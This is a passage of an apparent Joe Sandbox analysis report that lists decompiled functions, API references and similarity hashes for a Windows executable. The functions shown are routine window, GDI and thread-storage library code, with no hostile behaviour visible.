					_t22 = CreateDCA(_t23 + ( *_t23 & 0x0000ffff), _t23 + (_t23[1] & 0x0000ffff), _t23 + (_t23[2] & 0x0000ffff), _t9);
					GlobalUnlock(_v12);
					if(_t20 != 0) {
						GlobalUnlock(_t20);
					}
					return _t22;
				} else {
					goto L5;
				}
			}

0x00410326
0x00410349
0x00000000
0x00410349
0x00410334
0x00410336
0x0041033c
0x00410343
0x0041033e
0x0041033f
0x0041033f
0x00410347
0x0041036e
0x00410374
0x00410378
0x0041037b
0x0041037b
0x00000000
0x00000000
0x00000000
0x00000000

APIs

GlobalLock.KERNEL32 ref: 00410332
GlobalLock.KERNEL32 ref: 0041033F
CreateDCA.GDI32(?,?,?,00000000), ref: 00410362
GlobalUnlock.KERNEL32(?,?,00000000,00410247,?,?,?,004280B8,?,?,?,?,00403312,?), ref: 00410374
GlobalUnlock.KERNEL32(?,?,00000000,00410247,?,?,?,004280B8,?,?,?,?,00403312,?), ref: 0041037B

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Global$LockUnlock$Create
String ID:
API String ID: 2536725124-0
Opcode ID: 14f3dffca046701ab7d4ec2d1e6a0767d43de327b0a1f7fdd5dceb5adba20a1f
Instruction ID: 40030820e48ceddce583e067a62accdd91ad43b1dc9828fb23a1b5466954d7d6
Opcode Fuzzy Hash: 14f3dffca046701ab7d4ec2d1e6a0767d43de327b0a1f7fdd5dceb5adba20a1f
Instruction Fuzzy Hash: D0F08C32200225ABC3709B69CC44B67BBDCEF84B91B144826BC98D2210D768DC9596B4

Uniqueness

Uniqueness Score: -1.00%

Function 00420766, Relevance: 7.5, APIs: 5, Instructions: 44
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00420766(void* __ecx) {
				struct tagMSG _v28;
				void* _t9;
				void* _t13;
				void* _t25;

				_t25 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x50)) != 0) {
					if(PeekMessageA( &_v28,  *(__ecx + 0x1c), 0x367, 0x367, 3) == 0) {
						PostMessageA( *(_t25 + 0x1c), 0x367, 0, 0);
					}
					if(GetCapture() ==  *(_t25 + 0x1c)) {
						ReleaseCapture();
					}
					_t13 = E00414DCC(_t25);
					 *((intOrPtr*)(_t25 + 0x50)) = 0;
					 *((intOrPtr*)(_t13 + 0x50)) = 0;
					return PostMessageA( *(_t25 + 0x1c), 0x36a, 0, 0);
				}
				return _t9;
			}

0x0042076b
0x00420772
0x00420795
0x0042079d
0x0042079d
0x004207a8
0x004207aa
0x004207aa
0x004207b2
0x004207b9
0x004207c1
0x00000000
0x004207ca
0x004207d0

APIs

PeekMessageA.USER32(?,?,00000367,00000367,00000003), ref: 00420787
PostMessageA.USER32 ref: 0042079D
GetCapture.USER32 ref: 0042079F
ReleaseCapture.USER32 ref: 004207AA
PostMessageA.USER32 ref: 004207C7

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Message$CapturePost$PeekRelease
String ID:
API String ID: 1125932295-0
Opcode ID: fafcdf858dfd4d5881f13f031e6783ff2565456282c47121873f618ee18b7fdb
Instruction ID: 6827468c5831c533ec62b3620ea1e9f85116333d279ed9cea6cc2e4bf68413d0
Opcode Fuzzy Hash: fafcdf858dfd4d5881f13f031e6783ff2565456282c47121873f618ee18b7fdb
Instruction Fuzzy Hash: 82F0A431600748BFC6306F22EC44D177FBCFF81748B85466EF54192512D736B5068A68

Uniqueness

Uniqueness Score: -1.00%

Function 00408E53, Relevance: 7.5, APIs: 5, Instructions: 38
threadCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00408E53() {
				void _t10;
				long _t15;
				void* _t16;

				_t15 = GetLastError();
				_t16 = TlsGetValue( *0x436fb0);
				if(_t16 == 0) {
					_t16 = E00407333(1, 0x74);
					if(_t16 == 0 || TlsSetValue( *0x436fb0, _t16) == 0) {
						E00406490(0x10);
					} else {
						E00408E40(_t16);
						_t10 = GetCurrentThreadId();
						 *(_t16 + 4) =  *(_t16 + 4) | 0xffffffff;
						 *_t16 = _t10;
					}
				}
				SetLastError(_t15);
				return _t16;
			}

0x00408e61
0x00408e69
0x00408e6d
0x00408e78
0x00408e7e
0x00408ea8
0x00408e91
0x00408e92
0x00408e98
0x00408e9e
0x00408ea2
0x00408ea2
0x00408e7e
0x00408eaf
0x00408eb9

APIs

GetLastError.KERNEL32(?,00000000,0040903E,00000000,?,?,?,00406482,?,?,00000000,00000000), ref: 00408E55
TlsGetValue.KERNEL32(?,00000000,0040903E,00000000,?,?,?,00406482,?,?,00000000,00000000), ref: 00408E63
SetLastError.KERNEL32(00000000,?,00000000,0040903E,00000000,?,?,?,00406482,?,?,00000000,00000000), ref: 00408EAF

Part of subcall function 00407333: HeapAlloc.KERNEL32(00000008,?,?,?,?,00408E0B,00000001,00000074,?,004063F8), ref: 00407388

TlsSetValue.KERNEL32(00000000,?,00000000,0040903E,00000000,?,?,?,00406482,?,?,00000000,00000000), ref: 00408E87
GetCurrentThreadId.KERNEL32 ref: 00408E98

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: ErrorLastValue$AllocCurrentHeapThread
String ID:
API String ID: 2020098873-0
Opcode ID: 2b5b8b5e168096cfbcd271e56a6e16956dee3cf8b16a5a5d463a545d2d07131e
Instruction ID: 621b0a22466fadbf8087ca8eaa5014453414117e276020d1f2dab8d9fe1528b5
Opcode Fuzzy Hash: 2b5b8b5e168096cfbcd271e56a6e16956dee3cf8b16a5a5d463a545d2d07131e
Instruction Fuzzy Hash: 4FF0CD32A01612ABC3312B21FD0DA1F3B60EB01BA1715413EF985F62E0CF38980286EC

Uniqueness

Uniqueness Score: -1.00%

Function 004239AC, Relevance: 7.5, APIs: 5, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E004239AC(struct tagRECT* _a4, long _a8, signed char _a10) {
				void* __esi;
				void* __ebp;
				int _t13;
				int _t14;
				intOrPtr _t16;
				void* _t19;
				struct tagRECT* _t21;

				if( *0x439c44 != 0) {
					return AdjustWindowRectEx(_a4, _a8, 0, 0x188);
				}
				if((_a8 & 0x00040600) == 0) {
					_push(GetSystemMetrics(6));
					_push(5);
				} else {
					_push(GetSystemMetrics(0x21));
					_push(0x20);
				}
				_t13 = GetSystemMetrics();
				_t21 = _a4;
				_t14 = InflateRect(_t21, _t13, ??);
				if((_a10 & 0x000000c0) != 0) {
					E00422A19(_t19, _t21);
					_t16 =  *0x439c9c; // 0x0
					_t21->top = _t21->top - _t16;
					return _t16;
				}
				return _t14;
			}

0x004239b7
0x00000000
0x004239c6
0x004239d5
0x004239f0
0x004239f1
0x004239d7
0x004239e1
0x004239e2
0x004239e2
0x004239f3
0x004239f5
0x004239fa
0x00423a04
0x00423a06
0x00423a0b
0x00423a10
0x00000000
0x00423a10
0x00423a15

APIs

AdjustWindowRectEx.USER32(?,?,00000000,00000188), ref: 004239C6
GetSystemMetrics.USER32 ref: 004239DF
GetSystemMetrics.USER32 ref: 004239F3
InflateRect.USER32(?,00000000), ref: 004239FA

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: MetricsRectSystem$AdjustInflateWindow
String ID:
API String ID: 4080371637-0
Opcode ID: 67a0c6fe0a519a19a0a988f210252f9171ec363cbc846e234bf147fda85e58ab
Instruction ID: e5fc7e5830382d5c46746aa1a576b8dc40ee31b23e133811d6216470331d8181
Opcode Fuzzy Hash: 67a0c6fe0a519a19a0a988f210252f9171ec363cbc846e234bf147fda85e58ab
Instruction Fuzzy Hash: 3DF0C831740328BBDB205F94BD09BAA3B68EF01711F848026BA496B1D0C7F85E91CFD9

Uniqueness

Uniqueness Score: -1.00%

Function 004258D4, Relevance: 7.5, APIs: 5, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004258D4(long* __ecx) {
				long _t4;
				intOrPtr _t5;
				void* _t6;
				void* _t13;
				intOrPtr _t14;
				long* _t15;

				_t15 = __ecx;
				_t4 =  *__ecx;
				if(_t4 != 0xffffffff) {
					TlsFree(_t4);
				}
				_t1 = _t15 + 0x14; // 0x4c2b88
				_t5 =  *_t1;
				if(_t5 != 0) {
					do {
						_t14 =  *((intOrPtr*)(_t5 + 4));
						E00425BA0(_t15, _t5, 0);
						_t5 = _t14;
					} while (_t14 != 0);
				}
				_t3 = _t15 + 0x10; // 0x4b0100
				_t6 =  *_t3;
				if(_t6 != 0) {
					_t13 = GlobalHandle(_t6);
					GlobalUnlock(_t13);
					_t6 = GlobalFree(_t13);
				}
				DeleteCriticalSection(_t15 + 0x1c);
				return _t6;
			}

0x004258d5
0x004258d8
0x004258dd
0x004258e0
0x004258e0
0x004258e6
0x004258e6
0x004258eb
0x004258ed
0x004258ed
0x004258f5
0x004258fc
0x004258fc
0x004258ed
0x00425900
0x00425900
0x00425905
0x0042590e
0x00425911
0x00425918
0x00425918
0x00425922
0x0042592a

APIs

TlsFree.KERNEL32(00000000,?,?,00425DE1,00000000,00000001), ref: 004258E0
GlobalHandle.KERNEL32(004B0100), ref: 00425908
GlobalUnlock.KERNEL32(00000000,?,?,00425DE1,00000000,00000001), ref: 00425911
GlobalFree.KERNEL32 ref: 00425918
DeleteCriticalSection.KERNEL32(00439990,?,?,00425DE1,00000000,00000001), ref: 00425922

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Global$Free$CriticalDeleteHandleSectionUnlock
String ID:
API String ID: 2159622880-0
Opcode ID: b0e24e41586e67530e86372130e889ff14c8a03bde70290e60b9324eba9df65b
Instruction ID: 9d5b72b6300baeafbca016f02161f8457eec0fc2b083dcd5d79a1fa835123fe9
Opcode Fuzzy Hash: b0e24e41586e67530e86372130e889ff14c8a03bde70290e60b9324eba9df65b
Instruction Fuzzy Hash: 4AF05E31700A20DBC630AB39BC0CA2B77BDEF857207D5056AF811D3361DB78DC0686A8

Uniqueness

Uniqueness Score: -1.00%

Function 00428BA1, Relevance: 7.5, APIs: 5, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00428BA1(void* __ecx) {
				int _t22;

				_t22 = SaveDC( *(__ecx + 8));
				if( *(__ecx + 4) == 0) {
					 *((intOrPtr*)(__ecx + 0x1c)) = 0x7fff;
				} else {
					SelectObject( *(__ecx + 4), GetStockObject(0xd));
					 *((intOrPtr*)(__ecx + 0x1c)) = SaveDC( *(__ecx + 4)) - _t22;
					SelectObject( *(__ecx + 4),  *(__ecx + 0x28));
				}
				return _t22;
			}

0x00428bb5
0x00428bb7
0x00428be3
0x00428bb9
0x00428bcc
0x00428bd8
0x00428bde
0x00428be0
0x00428bef

APIs

SaveDC.GDI32(?), ref: 00428BAF
GetStockObject.GDI32(0000000D), ref: 00428BBC
SelectObject.GDI32(00000000,00000000), ref: 00428BCC
SaveDC.GDI32(00000000), ref: 00428BD1
SelectObject.GDI32(00000000,?), ref: 00428BDE

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Object$SaveSelect$Stock
String ID:
API String ID: 2785865535-0
Opcode ID: b0c6eb11383a7c2230445b6428623304df77a31237e978569f1d240e3b2e7084
Instruction ID: 39288a4f9771774ee527ad7dc5e24ccfae81283b4a828b13e1b5aa3fcaf6deb1
Opcode Fuzzy Hash: b0c6eb11383a7c2230445b6428623304df77a31237e978569f1d240e3b2e7084
Instruction Fuzzy Hash: 05F05871201708AFD7312F66EC44E2BBBA9EB44751B40453EE15682520DB72B816DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041C80F, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 302
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E0041C80F(intOrPtr* __ecx, void* __edx, intOrPtr* _a4, signed int _a8, signed int _a12) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				struct tagRECT _v44;
				signed int _v48;
				signed int _v52;
				struct tagRECT _v68;
				intOrPtr _t173;
				intOrPtr* _t174;
				intOrPtr _t177;
				signed char _t179;
				intOrPtr* _t181;
				signed char _t185;
				signed int _t187;
				signed int _t188;
				intOrPtr* _t202;
				signed int _t205;
				signed int _t206;
				signed int _t215;
				signed int _t224;
				intOrPtr* _t227;
				intOrPtr* _t232;
				intOrPtr _t233;
				signed int _t250;
				signed int _t252;
				signed int _t256;
				signed int _t260;
				void* _t263;
				signed int _t266;
				signed int _t268;
				intOrPtr _t272;
				signed int _t275;
				signed int _t279;

				_t263 = __edx;
				_t227 = __ecx;
				_t266 = 0;
				_push(0);
				_push(0);
				_push(0x418);
				_v8 = 0;
				_v52 = 0;
				_v48 = 0;
				_t275 =  *((intOrPtr*)( *__ecx + 0xa0))();
				_v28 = _t275;
				if(_t275 != 0) {
					_t177 = E004131DD(_t275 + _t275 * 4 << 2);
					_v8 = _t177;
					if(_t275 > 0) {
						_v12 = _t177;
						do {
							E0041C295(_t227, _t266, _v12);
							_v12 = _v12 + 0x14;
							_t266 = _t266 + 1;
						} while (_t266 < _t275);
						_t268 = 0;
						if(_t275 > 0) {
							_t179 =  *(_t227 + 0x64);
							if((_t179 & 0x00000002) == 0) {
								_t256 = _t179 & 0x00000004;
								_v44.bottom = _t256;
								if(_t256 == 0) {
									L19:
									_push(_t268);
									asm("sbb eax, eax");
									_t215 =  ~(_a8 & 0x00000002) & 0x00007fff;
									__eflags = _t215;
									_push(_t215);
								} else {
									if((_a8 & 0x00000004) != 0) {
										L18:
										_push(_t268);
										_push( *((intOrPtr*)(_t227 + 0x54)));
									} else {
										if((_a8 & 0x00000008) == 0) {
											__eflags = _a8 & 0x00000010;
											if((_a8 & 0x00000010) == 0) {
												__eflags = _a12 - 0xffffffff;
												if(_a12 == 0xffffffff) {
													__eflags = _t179 & 0x00000001;
													if((_t179 & 0x00000001) == 0) {
														goto L19;
													} else {
														goto L18;
													}
												} else {
													SetRectEmpty( &_v44);
													E0041F52D(_t227,  &_v44, _a8 & 0x00000002);
													_t224 = _a8 & 0x00000020;
													__eflags = _t224;
													if(_t224 == 0) {
														_t260 = _v44.right - _v44.left;
														__eflags = _t260;
													} else {
														_t260 = _v44.bottom - _v44.top;
													}
													_push(_t224);
													_push(_t260 + _a12);
												}
											} else {
												_push(0);
												_push(0);
											}
										} else {
											_push(0);
											_push(0x7fff);
										}
									}
								}
								_push(_t275);
								_push(_v8);
								E0041C6B2(_t227, _t263);
							}
							_push(_t275);
							_push(_v8);
							_push( &(_v44.right));
							_t181 = E0041C4B6(_t227);
							_v52 =  *_t181;
							_v48 =  *((intOrPtr*)(_t181 + 4));
							if((_a8 & 0x00000040) != 0) {
								 *(_t227 + 0x84) =  *(_t227 + 0x84) & 0x00000000;
								_v20 = _t268;
								_v44.bottom =  *(_t227 + 0x84);
								if(_t275 > 0) {
									_t250 = _t275;
									_t202 = _v8 + 4;
									_v24 = _t202;
									do {
										if(( *(_t202 + 5) & 0x00000001) != 0 &&  *_t202 != 0) {
											_t268 = _t268 + 1;
										}
										_t202 = _t202 + 0x14;
										_t250 = _t250 - 1;
									} while (_t250 != 0);
									if(_t268 > 0) {
										_t205 = E004131DD(_t268 + _t268 * 2 << 3);
										if(_t205 == 0) {
											_t205 = 0;
											__eflags = 0;
										} else {
											_a12 = _t268 - 1;
										}
										_v16 = _v16 & 0x00000000;
										_a12 = _a12 & 0x00000000;
										_v20 = _t205;
										_t67 = _t205 + 8; // 0x8
										_t272 = _t67;
										_t206 = _v24;
										_v12 = _t272;
										_v24 = _t206;
										do {
											if(( *(_t206 + 5) & 0x00000001) != 0 &&  *_t206 != 0) {
												_t252 = _a12;
												 *((intOrPtr*)(_t272 - 8)) = _t252;
												 *((intOrPtr*)(_t272 - 4)) =  *_t206;
												 *((intOrPtr*)( *_t227 + 0xe0))(_t252,  &_v68);
												E0041A32D(_t227,  &_v68);
												_v16 = _v16 + 1;
												asm("movsd");
												asm("movsd");
												_v12 = _v12 + 0x18;
												_t206 = _v24;
												asm("movsd");
												asm("movsd");
												_t275 = _v28;
												_t272 = _v12;
											}
											_a12 = _a12 + 1;
											_t206 = _t206 + 0x14;
											_v24 = _t206;
										} while (_a12 < _t275);
										_t268 = _v16;
									}
								}
								_t185 =  *(_t227 + 0x64);
								if((_t185 & 0x00000001) != 0 && (_t185 & 0x00000004) != 0) {
									 *((intOrPtr*)(_t227 + 0x54)) = _v52;
								}
								_a12 = _a12 & 0x00000000;
								_t308 = _t275;
								if(_t275 > 0) {
									_v16 = _v8;
									do {
										E0041C2B4(_t227, _t308, _a12, _v16);
										_a12 = _a12 + 1;
										_v16 = _v16 + 0x14;
									} while (_a12 < _t275);
								}
								if(_t268 > 0) {
									_t187 = _v20;
									_v24 = _t268;
									_t113 = _t187 + 8; // 0x8
									_t279 = _t113;
									_a12 = _t279;
									do {
										_t188 = E0041649C(_t227,  *((intOrPtr*)(_t279 - 4)));
										_v28 = _t188;
										if(_t188 != 0) {
											GetWindowRect( *(_t188 + 0x1c),  &_v68);
											 *((intOrPtr*)( *_t227 + 0xe0))( *((intOrPtr*)(_a12 - 8)),  &_v68);
											E0041663D(_v28, 0, _v68.left -  *_t279 + _v68.left, _v68.top -  *((intOrPtr*)(_t279 + 4)) + _v68.top, 0, 0, 0x15);
											_t279 = _a12;
										}
										_t279 = _t279 + 0x18;
										_t130 =  &_v24;
										 *_t130 = _v24 - 1;
										_a12 = _t279;
									} while ( *_t130 != 0);
									E00413206(_v20);
								}
								 *(_t227 + 0x84) = _v44.bottom;
							}
							E00413206(_v8);
						}
					}
				}
				SetRectEmpty( &_v68);
				E0041F52D(_t227,  &_v68, _a8 & 0x00000002);
				_v48 = _v48 + _v68.top - _v68.bottom;
				_v52 = _v52 + _v68.left - _v68.right;
				_t232 = E0041E6BA( &(_v44.right), _a8 & 0x00000001, _a8 & 0x00000002);
				_t173 =  *_t232;
				_t233 =  *((intOrPtr*)(_t232 + 4));
				if(_v52 <= _t173) {
					_v52 = _t173;
				}
				if(_v48 <= _t233) {
					_v48 = _t233;
				}
				_t174 = _a4;
				 *_t174 = _v52;
				 *((intOrPtr*)(_t174 + 4)) = _v48;
				return _t174;
			}

0x0041c80f
0x0041c818
0x0041c81a
0x0041c81e
0x0041c81f
0x0041c820
0x0041c825
0x0041c828
0x0041c82b
0x0041c834
0x0041c838
0x0041c83b
0x0041c848
0x0041c850
0x0041c853
0x0041c859
0x0041c85c
0x0041c862
0x0041c867
0x0041c86b
0x0041c86c
0x0041c870
0x0041c874
0x0041c87a
0x0041c87f
0x0041c887
0x0041c88a
0x0041c88d
0x0041c8f8
0x0041c8fb
0x0041c900
0x0041c902
0x0041c902
0x0041c907
0x0041c88f
0x0041c893
0x0041c8f2
0x0041c8f2
0x0041c8f3
0x0041c895
0x0041c899
0x0041c8a3
0x0041c8a7
0x0041c8ad
0x0041c8b1
0x0041c8ee
0x0041c8f0
0x00000000
0x00000000
0x00000000
0x00000000
0x0041c8b3
0x0041c8b7
0x0041c8ca
0x0041c8d2
0x0041c8d2
0x0041c8d5
0x0041c8e2
0x0041c8e2
0x0041c8d7
0x0041c8da
0x0041c8da
0x0041c8e5
0x0041c8eb
0x0041c8eb
0x0041c8a9
0x0041c8a9
0x0041c8aa
0x0041c8aa
0x0041c89b
0x0041c89b
0x0041c89c
0x0041c89c
0x0041c899
0x0041c893
0x0041c908
0x0041c90b
0x0041c90e
0x0041c90e
0x0041c913
0x0041c917
0x0041c91c
0x0041c91d
0x0041c92b
0x0041c92e
0x0041c931
0x0041c93d
0x0041c946
0x0041c949
0x0041c94c
0x0041c955
0x0041c957
0x0041c95a
0x0041c95d
0x0041c961
0x0041c968
0x0041c968
0x0041c969
0x0041c96c
0x0041c96c
0x0041c971
0x0041c97e
0x0041c986
0x0041c98e
0x0041c98e
0x0041c988
0x0041c989
0x0041c989
0x0041c990
0x0041c994
0x0041c998
0x0041c99b
0x0041c99b
0x0041c99e
0x0041c9a1
0x0041c9a4
0x0041c9a7
0x0041c9ab
0x0041c9b2
0x0041c9b8
0x0041c9bd
0x0041c9c6
0x0041c9d2
0x0041c9da
0x0041c9dd
0x0041c9de
0x0041c9df
0x0041c9e3
0x0041c9e6
0x0041c9e7
0x0041c9e8
0x0041c9eb
0x0041c9eb
0x0041c9ee
0x0041c9f1
0x0041c9f7
0x0041c9f7
0x0041c9fc
0x0041c9fc
0x0041c971
0x0041c9ff
0x0041ca04
0x0041ca0d
0x0041ca0d
0x0041ca10
0x0041ca14
0x0041ca16
0x0041ca1b
0x0041ca1e
0x0041ca26
0x0041ca2b
0x0041ca2e
0x0041ca32
0x0041ca1e
0x0041ca39
0x0041ca3b
0x0041ca3e
0x0041ca41
0x0041ca41
0x0041ca44
0x0041ca47
0x0041ca4c
0x0041ca53
0x0041ca56
0x0041ca5f
0x0041ca82
0x0041ca9e
0x0041caa3
0x0041caa3
0x0041caa6
0x0041caa9
0x0041caa9
0x0041caac
0x0041caac
0x0041cab4
0x0041cab9
0x0041cabd
0x0041cabd
0x0041cac6
0x0041cacb
0x0041c874
0x0041c853
0x0041cad0
0x0041cae3
0x0041caf1
0x0041cafa
0x0041cb0d
0x0041cb12
0x0041cb17
0x0041cb1a
0x0041cb1c
0x0041cb1c
0x0041cb22
0x0041cb24
0x0041cb24
0x0041cb27
0x0041cb2d
0x0041cb32
0x0041cb36

APIs

SetRectEmpty.USER32(?), ref: 0041C8B7
GetWindowRect.USER32 ref: 0041CA5F
SetRectEmpty.USER32(?), ref: 0041CAD0

Strings

@, xrefs: 0041C924

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Rect$Empty$Window
String ID: @
API String ID: 444217639-2766056989
Opcode ID: d032af0db132cd29ccf4fbc2b8467907f78f06d14932db45b8acfededcc1a552
Instruction ID: cf120915a9bc79257b06898680a609e4f39c2be92c1a3f6b3b2cd3709033a41d
Opcode Fuzzy Hash: d032af0db132cd29ccf4fbc2b8467907f78f06d14932db45b8acfededcc1a552
Instruction Fuzzy Hash: 81C14771A40219AFCF15DFA8CC84AEEBBB5FF44354F04816AE815AB351D738AD81CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00418A76, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112
stringCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E00418A76() {
				intOrPtr _t35;
				void* _t38;
				intOrPtr _t48;
				intOrPtr _t49;
				void* _t50;
				void* _t64;
				intOrPtr* _t74;
				intOrPtr _t76;
				intOrPtr _t77;
				void* _t78;
				intOrPtr _t90;

				E00406520(E00429F80, _t78);
				_t35 =  *0x436980; // 0x436994
				_t55 =  *((intOrPtr*)(_t78 + 0x14));
				 *((intOrPtr*)(_t78 - 0x10)) =  *((intOrPtr*)(_t78 + 0x14));
				 *((intOrPtr*)(_t78 + 0x14)) = _t35;
				_t74 =  *((intOrPtr*)(_t78 + 0xc));
				 *(_t78 - 4) = 0;
				if(_t74 == 0) {
					L19:
					if( *((intOrPtr*)( *((intOrPtr*)(_t78 + 0x14)) - 8)) == 0) {
						_t90 =  *0x439c48; // 0x1
						_push(0x104);
						if(_t90 == 0) {
							lstrcpynA(_t78 - 0x114,  *(_t78 + 8), ??);
						} else {
							_push(_t78 - 0x114);
							_push( *(_t78 + 8));
							E00417CBF();
						}
						E0041E3FA(_t78 + 0x14, _t55, _t78 - 0x114);
					}
					E0041BB46( *((intOrPtr*)(_t78 + 0x14)), 0x30,  *((intOrPtr*)(_t78 - 0x10)));
					L25:
					 *(_t78 - 4) =  *(_t78 - 4) | 0xffffffff;
					_t38 = E00416AEC(_t78 + 0x14);
					 *[fs:0x0] =  *((intOrPtr*)(_t78 - 0xc));
					return _t38;
				}
				if(E00416753(_t74, 0x42d4d0) != 0) {
					goto L25;
				}
				if(E00416753(_t74, ?str?) == 0) {
					_t48 = E00416753(_t74, "H�B");
					__eflags = _t48;
					if(_t48 == 0) {
						goto L19;
					}
					_t49 =  *((intOrPtr*)(_t74 + 0x10));
					_t64 = _t74 + 0x10;
					__eflags =  *((intOrPtr*)(_t49 - 8));
					if( *((intOrPtr*)(_t49 - 8)) == 0) {
						E00416BE5(_t64,  *(_t78 + 8));
					}
					_t50 = E00416CC1(_t78 + 0x14, _t78, 0xff);
					__eflags =  *((intOrPtr*)( *_t74 + 0xc))(_t50, 0x100, _t78 - 0x10);
					if(__eflags == 0) {
						_t76 =  *((intOrPtr*)(_t74 + 8));
						__eflags = _t76 - 2;
						if(__eflags >= 0) {
							__eflags = _t76 - 3;
							if(__eflags <= 0) {
								_t55 = 0xf121;
							} else {
								__eflags = _t76 - 5;
								if(_t76 == 5) {
									__eflags =  *((intOrPtr*)(_t78 + 0x10));
									_t55 = (0 | __eflags != 0x00000000) + 0xf123;
								} else {
									__eflags = _t76 - 0xd;
									if(__eflags == 0) {
										_t55 = 0xf122;
									}
								}
							}
						}
					}
					E00416D10(_t78 + 0x14, __eflags, 0xffffffff);
				} else {
					_t77 =  *((intOrPtr*)(_t74 + 8));
					if(_t77 == 3 || _t77 > 4 && _t77 <= 7) {
						_t55 = 0xf120;
					}
				}
			}

0x00418a7b
0x00418a86
0x00418a8c
0x00418a91
0x00418a94
0x00418a97
0x00418a9e
0x00418aa1
0x00418b71
0x00418b77
0x00418b79
0x00418b7f
0x00418b84
0x00418ba1
0x00418b86
0x00418b8c
0x00418b8d
0x00418b90
0x00418b90
0x00418bb3
0x00418bb3
0x00418bc0
0x00418bc5
0x00418bc5
0x00418bcc
0x00418bd7
0x00418bdf
0x00418bdf
0x00418ab5
0x00000000
0x00000000
0x00418ac9
0x00418af6
0x00418afb
0x00418afd
0x00000000
0x00000000
0x00418aff
0x00418b02
0x00418b05
0x00418b08
0x00418b0d
0x00418b0d
0x00418b1a
0x00418b30
0x00418b32
0x00418b34
0x00418b37
0x00418b3a
0x00418b3c
0x00418b3f
0x00418b62
0x00418b41
